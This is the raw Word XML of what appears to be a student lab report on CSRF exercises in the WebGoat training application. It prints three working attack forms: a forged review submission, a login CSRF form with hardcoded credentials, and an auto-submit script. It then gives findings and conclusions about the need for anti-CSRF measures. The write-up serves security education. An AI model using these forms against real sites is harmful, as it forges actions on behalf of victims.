      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Steps Taken:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B4501E" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A72648B" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Identify the Target Web Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3187F393" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Select a web application with CSRF vulnerabilities, allowing actions without adequate anti-CSRF protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47982864" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Craft HTML and JavaScript Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335263F0" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Use browser developer tools to create HTML and JavaScript code that simulates a CSRF attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD0BF55" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Embed the crafted code in an HTML file for execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0304F70E" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;!--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fake HTML page for Basic Get CSRF Exercise --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70868E4D" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;form accept-charset="UNKNOWN" id="basic-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">-get" method="POST" name="form1" target="_blank" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>successcallback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>="" action="http://localhost:8080/WebGoat/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/basic-get-flag"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750E2558" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;input name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>" type="hidden" value="false"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB9E06" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;input type="submit" name="submit"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAA2C2A" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D14E1" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC702D5" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;!--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF Attack - Post a review on someone else’s behalf --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C49266" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;form class="attack-form" accept-charset="UNKNOWN" id="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">-review" method="POST" name="review-form" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>successcallback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>="" action="http://localhost:8080/WebGoat/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/review"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653137E8" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>reviewText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>" type="text" value="Oh no!"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3AABDB" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="stars" type="text" value="5"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DFAB9A" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>validateReq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>" value="2aa14227b9a13d0bede0388a7fba9aa9"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC711E1" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;input type="submit" name="submit" value="Submit review"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C05C3E5" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64391C41" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DFDD150" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;!--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF Attack - Login CSRF attack --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D53D2E4" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;form action="http://localhost:8080/WebGoat/login" method="POST" style="width: 200px;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE2CCC" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="username" value="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7799823F" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;input type="hidden" name="password" value="hello123"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5726998E" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;button type="submit"&gt;Sign in&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDDC15C" w14:textId="77777777" w:rsidR="00F02790" w:rsidRPr="00F02790" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71415C16" w14:textId="1C4FF264" w:rsidR="00F02790" w:rsidRPr="00BB4AF9" w:rsidRDefault="00F02790" w:rsidP="00F02790">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>document.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>login.submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F02790">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>()&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35491538" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Exploit the CSRF Vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBFCA0D" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Open the crafted HTML file in a Firefox browser to execute the CSRF attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB74438" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Observe the impact on the target system and affected user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F82F04" w14:textId="62E65B6E" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Address Challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3063E6" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Identify and address any challenges encountered during the execution of the CSRF attack with developer tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D755848" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Results and Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C88106" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0A85DD" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Vulnerabilities Discovered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABE6273" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Successfully exploited the CSRF vulnerability using browser developer tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D3B6A9" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Data or Access Gained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691345E9" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Demonstrated the ability to manipulate user actions and perform unauthorized operations on behalf of the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236DF7A7" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Unexpected Outcomes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC28CBF" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Uncovered potential secondary vulnerabilities or unexpected consequences during the exercise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9E5560" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Analysis and Conclusions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3E237B" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E41D32" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F40D636" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Browser developer tools can be used to craft and execute CSRF attacks, emphasizing the need for robust anti-CSRF measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5566C7A8" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Insights:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63066367" w14:textId="77777777" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4AF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Understanding the ease with which attackers can manipulate HTML and JavaScript to perform CSRF attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAEC043" w14:textId="77777777" w:rsidR="00625902" w:rsidRDefault="00625902" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07204B6D" w14:textId="22EEC2AA" w:rsidR="00BB4AF9" w:rsidRPr="00BB4AF9" w:rsidRDefault="00BB4AF9" w:rsidP="00BB4AF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
